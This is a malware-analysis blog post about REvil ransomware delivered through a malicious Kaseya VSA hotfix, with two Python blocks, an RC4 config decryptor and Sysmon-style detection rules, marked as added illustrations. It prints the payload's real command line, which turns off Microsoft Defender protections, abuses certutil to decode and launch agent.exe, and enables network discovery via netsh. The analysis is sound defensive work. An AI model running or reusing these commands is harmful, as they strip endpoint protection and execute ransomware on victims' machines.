Dissection of REvil Ransomware: Kaseya VSA Supply Chain Attack

Watch the video where we analyze the Kaseya VSA supply chain attack and dissect the REvil ransomware through Sandbox Execution.

Update on July 5, 2021: 

The REvil ransomware group posted a message on its leak site on the dark web, claiming to have compromised Kaseya, an MSP provider, on July 02, 2021. The group also claims that a million systems have been impacted by the ransomware so far, and is demanding 70 million USD in BTC to publicly publish a decryptor for all victims. 

Figure 1: REvil’s post 

Kaseya, a complete IT solution management company, released a public media notice stating that their product VSA, dealing with remote monitoring & management, is under attack.   

The public notice released on July 2, 2021, at 10:00 PM EST states:    

  1. “All on-premises VSA servers should continue to remain down until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA.”    
  2. “SaaS & hosted VSA servers will become operational once Kaseya has determined that we can safely restore operations.”    

According to researchers, a massive supply chain attack executed by the REvil ransomware group against “Kaseya VSA” has impacted several Managed Service Providers (MSPs) and their clients. The ransomware was delivered through what appeared to be an automatic update of the product. Kaseya’s remote IT management software administers systems with high privileges, which makes it easy for the ransomware to propagate across a client’s systems.     

The attack chain of the Kaseya VSA Ransomware attack is depicted in the following diagram.  

Figure 2: Attack chain of Kaseya VSA Ransomware attack 

Kaseya VSA is an automated software patch management and vulnerability management system. The ransomware group abused the software update mechanism, pushing a malicious Kaseya VSA agent hotfix that delivers the REvil encryptor payload to clients. The hotfix file, called “agent.exe”, contains an embedded malicious DLL that is side-loaded by the legitimate Microsoft Defender executable, “MsMpEng.exe”. 

REvil (Ransomware Evil), also known as Sodinokibi, was formed in 2019 and operates as ransomware-as-a-service, i.e., it provides prebuilt ransomware tooling to affiliates who carry out the attacks. The ransomware was first used by the GOLD SOUTHFIELD threat group. REvil is one of the most sophisticated ransomware groups and is behind several significant attacks. Figure 3 shows the ransom note used by REvil.     

  Figure 3: Ransom note  

Technical Analysis 

The Cyble research team discovered a recent REvil ransomware sample with SHA256 D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E. 

The main REvil sample was found to be a dropper: a VC (Visual C++) compiled binary carrying malicious resources named “SOFTIS” and “MODLIS”.   

As shown in Figure 4, it loads these resources at runtime; the resources are the REvil payload “mpsvc.dll” and the loader “MsMpEng.exe”.   

  Figure 4: Dropper file  

Upon execution, the dropper writes the REvil payload file and the loader file to the following system directory:   

C:\Windows\mpsvc.dll (REvil payload, side-loaded by the legitimate Microsoft Defender executable) 

C:\Windows\MsMpEng.exe (legitimate Microsoft Defender executable, used as the loader) 

Figure 5 below shows the dropped payloads on the victim’s machine and their execution.  

Figure 5: Payload files    

The dropper file and the ransomware payload both carry valid code-signing certificates issued to the same signer, PB03 TRANSPORT LTD, as depicted in the image below.  

Figure 6: Certificate Information 

The REvil ransomware payload has an embedded RC4-encrypted configuration, which is decrypted at runtime, as shown in Figure 7. 

Figure 7: Decrypted Configuration File of REvil 

The REvil ransomware configuration is stored in JSON format with the configuration parameters shown below.  

Key     Description 
et      Encryption type 
wipe    Erase directories 
ext     Targeted file extension 
dbg     Debugging flag 
fld     Backup program directories 
wfld    Whitelisted directories 
prc     List of processes to terminate 
dmn     C2 domains 
svc     Services to be disabled 
net     Encrypt network shared drives 
exp     Attempt privilege-escalation exploit 
nname   File name of the ransom note (readme.txt) 
nbody   Ransom note body, Base64-encoded 

The image below highlights the configuration file with C2 domains, Base64 decoded ransom note, and services stopped by the payload.  

Figure 8: Configuration File in JSON Format 
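As an added illustration (not code from the original post or from Cyble), the following Python shows how an RC4-encrypted JSON configuration with the key layout in the table above can be decrypted, parsed, and reduced to the fields a responder acts on, including the Base64 ransom note. The RC4 key, the sample values and the encrypted blob are all constructed here; the real sample's resource layout is not modelled.

```python
import base64
import json

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decrypt_config(key: bytes, blob: bytes) -> dict:
    """Decrypt the embedded RC4 blob and parse the JSON document inside it."""
    return json.loads(rc4(key, blob).decode("utf-8"))

def summarize_config(cfg: dict) -> dict:
    """Pull out the fields a responder acts on first, decoding the Base64 ransom note."""
    return {
        "c2_domains": cfg.get("dmn", []),
        "services_disabled": cfg.get("svc", []),
        "processes_killed": cfg.get("prc", []),
        "encrypt_network_shares": bool(cfg.get("net")),
        "note_filename": cfg.get("nname"),
        "note_text": base64.b64decode(cfg.get("nbody", "")).decode("utf-8", "replace"),
    }

# Constructed sample config using the key names from the table above; every value,
# including the RC4 key, is a placeholder and not the real sample's configuration.
SAMPLE_CONFIG = {
    "et": 0, "wipe": True, "ext": [".txt", ".docx"], "dbg": False, "fld": ["backup"], "wfld": ["windows"],
    "prc": ["outlook.exe", "sqlservr.exe"],
    "dmn": ["c2-one.example.invalid", "c2-two.example.invalid"],
    "svc": ["vss", "sql"], "net": True, "exp": False,
    "nname": "readme.txt",
    "nbody": base64.b64encode(b"CONSTRUCTED RANSOM NOTE TEXT").decode(),
}
DEMO_KEY = b"constructed-demo-rc4-key"
ENCRYPTED_BLOB = rc4(DEMO_KEY, json.dumps(SAMPLE_CONFIG).encode())  # stands in for the resource

if __name__ == "__main__":
    for field, value in summarize_config(decrypt_config(DEMO_KEY, ENCRYPTED_BLOB)).items():
        print(f"{field}: {value}")
```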

REvil runs the command netsh advfirewall firewall set rule group="network discovery" new enable=yes to change the firewall settings so that the local computer can be discovered on its network.   

Figure 9: Enabling Network Discovery 

This is followed by the creation of a registry key that stores the attacker’s and the victim’s encryption keys, along with the generated unique file extension. 

The registry key created in this case is: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter  

Figure 10: Registry key added by REvil 

As shown below, the payload starts enumerating folders and loads each targeted file into memory for encryption. 

Figure 11: File System Enumeration 

The payload then encrypts the plain text content and writes back the encrypted content in the file. The debugger image below showcases the encrypted file content. After encryption, the files are appended with a unique extension generated by the ransomware. 

Figure 12: Encrypting Plain Text Content and Writing the Encrypted Content in the File  

Finally, the ransomware locks the victim’s screen and displays the ransom note. Figure 13 shows the lock screen with the encrypted files. The ransomware does not require an active internet connection to perform encryption, and it generates a unique key for every infected system.    

  Figure 13: Lock screen with Encrypted files  

Moreover, REvil can disable Microsoft Defender protections through Set-MpPreference settings such as DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtection, and DisableScriptScanning. The payload tries to execute the following PowerShell command to disrupt Microsoft Defender, as shown below. 

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 
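The behaviours described in this analysis (MsMpEng.exe launched from outside Defender's install directory, Set-MpPreference switching protections off, the netsh network-discovery change, the certutil copy-and-decode chain, and the BlackLivesMatter registry key) translate directly into detection logic. The following Python is an added example, not from the original post or from Cyble: the Sysmon-style telemetry is constructed, and the Defender install directories are an assumption.

```python
import re

# Constructed Sysmon-style telemetry (not real incident logs); the last event is the legitimate Defender engine and must not fire.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\MsMpEng.exe", "cmdline": r"C:\Windows\MsMpEng.exe"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
                r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
                r"-DisableRealtimeMonitoring $true -DisableScriptScanning $true -Force & "
                r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
                r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe"},
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="network discovery" new enable=yes'},
    {"type": "registry", "key": r"HKLM\SOFTWARE\WOW6432Node\BlackLivesMatter"},
    {"type": "process", "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "cmdline": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
]

# Assumption: Defender's engine legitimately runs only from these two directories.
DEFENDER_DIRS = (r"c:\program files\windows defender", r"c:\programdata\microsoft\windows defender\platform")

def msmpeng_outside_defender_dir(ev):
    """MsMpEng.exe started from a directory Defender does not install to (side-loading setup)."""
    img = ev["image"].lower()
    return img.endswith(r"\msmpeng.exe") and not img.startswith(DEFENDER_DIRS)

def defender_tampering(ev):
    """Set-MpPreference used to switch a protection feature off."""
    return re.search(r"set-mppreference.*-disable\w+\s+\$true", ev["cmdline"], re.I) is not None

def network_discovery_enabled(ev):
    cl = ev["cmdline"].lower()
    return "netsh" in cl and "advfirewall" in cl and "network discovery" in cl and "enable=yes" in cl

def certutil_copied_and_decoding(ev):
    cl = ev["cmdline"].lower()
    return "copy" in cl and "certutil.exe" in cl and "-decode" in cl

def revil_registry_key(ev):
    """The key where the payload stores its encryption keys and generated extension."""
    return ev["key"].lower().endswith(r"\blacklivesmatter")

RULES = [("process", msmpeng_outside_defender_dir), ("process", defender_tampering),
         ("process", network_discovery_enabled), ("process", certutil_copied_and_decoding), ("registry", revil_registry_key)]

def detect(events):
    """Return (rule name, event index) for every rule that fires on the telemetry."""
    return [(fn.__name__, i) for i, ev in enumerate(events) for etype, fn in RULES if ev["type"] == etype and fn(ev)]
```

Running `detect(SAMPLE_EVENTS)` yields five hits across the first four events and none for the legitimate Defender process.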

The ransom note contains a link, which can only be accessed using the keys present in the ransom note. The link belongs to REvil (Sodinokibi), and the page behind it shows the ransom amount, the decryptor, and a timer.  

  Figure 14 showcases the website of the ransomware group present in the ransom note.   

  Figure 14: REvil’s Ransomware group website    

Figure 15 shows the attack heat map for the REvil ransomware group. As of July 8, 2021, there have been 140 victims of the REvil ransomware.    

  Figure 15: REvil’s Attack Heat Map  

Figure 16 depicts the industry-wise attack distribution of the REvil ransomware victims observed by the Cyble Research team.   

Figure 16: REvil’s Industry-wise Attack Distribution  

REvil is one of the most active ransomware groups, targeting multiple victims on a regular basis. As per our research, the group’s activity may be geared towards massive supply chain attacks.  

Cyber espionage activities are evolving quickly, and we have seen supply chain attacks in the past as well, which have impacted large organizations. Attackers will continue to find new attack vectors to remain evasive, so it becomes essential for organizations to harden their security.     

Our Recommendations   

  • Use the shared IoCs to monitor and block the malware infection.  
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Conduct regular & timely patching of vulnerabilities on your infrastructure. 
  • Use a reputable anti-virus and Internet security software package on your connected devices, including PCs, laptops, and mobile devices. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity. 
  • Conduct regular backup practices and keep those backups offline or in a separate network.   

Indicators of Compromise (IoCs):     

Indicator                                                                  Type     Description  
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd           SHA-256  mpsvc.dll  
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2           SHA-256  DLL file  
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e           SHA-256  sample.exe  
9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1           SHA-256  file.exe  
hxxp[:]//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion  URL      Tor link   

About Cyble: 

Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups to Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com
